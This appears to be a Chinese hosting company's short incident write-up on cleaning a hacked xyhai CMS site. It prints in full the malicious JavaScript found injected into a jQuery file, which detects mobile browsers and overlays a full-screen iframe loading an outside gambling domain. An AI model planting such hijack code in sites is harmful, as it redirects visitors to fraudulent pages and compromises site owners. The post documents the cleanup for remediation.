服務熱線
針對xyhai行云海CMS被掛黑鏈的一次檢測處理
文章作者:恒愛云[恒愛網絡]
閱讀次數:1795
發布時間:2025-12-11
某用戶使用的xyhai行云海CMS原本是在阿里云云服里搭建的,手機端被掛黑鏈導致調轉到黑彩頁面。無法自行處理,因此轉移到我們這邊的同時讓處理一下。
首先針對PHP源碼查了一下,沒有異常,那很可能是JS代碼挾持了。搜索了一下 終于在 /Public/Home/default/js/jquery.min.js 里找到惡意片段。
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?8c2329bf3b7dca93314fdf50fbbc09cf";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
//除了上面的統計代碼,以下為惡意劫持代碼
var url = ['https://600tk-okgs-411.087mn8r61c.cc'];
var MobielUrl = url[Math.floor((Math.random()*url.length))];
function is_mobile() {
var regex_match = /(nokia|iphone|android|motorola|^mot-|softbank|foma|docomo|kddi|up.browser|up.link|htc|dopod|blazer|netfront|helio|hosin|huawei|novarra|CoolPad|webos|techfaith|palmsource|blackberry|alcatel|amoi|ktouch|nexian|samsung|^sam-|s[cg]h|^lge|ericsson|philips|sagem|wellcom|bunjalloo|maui|symbian|smartphone|midp|wap|phone|windows ce|iemobile|^spice|^bird|^zte-|longcos|pantech|gionee|^sie-|portalmmm|jigs browser|hiptop|^benq|haier|^lct|operas*mobi|opera*mini|320x320|240x320|176x220)/i;
var u = navigator.userAgent;
if (null == u) {
return true;
}
var result = regex_match.exec(u);
if (null == result) {
return false
} else {
return true
}
}
if (is_mobile()) {
document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
document.write('<style>html,body{widht:100%;height:100%;overflow:hidden; clear:both;}</style>');
document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;">');
document.write('<if'+'rame src="'+MobielUrl+' " frameborder="0" style="border:0;width: 100%; text-align: center; background: #f2f2f2; border: medium none; height:100%;max-height: 4000px;">'+'</iframe>');
document.write('</div>');
}
將惡意代碼刪除之后保存,網站終于恢復正常。
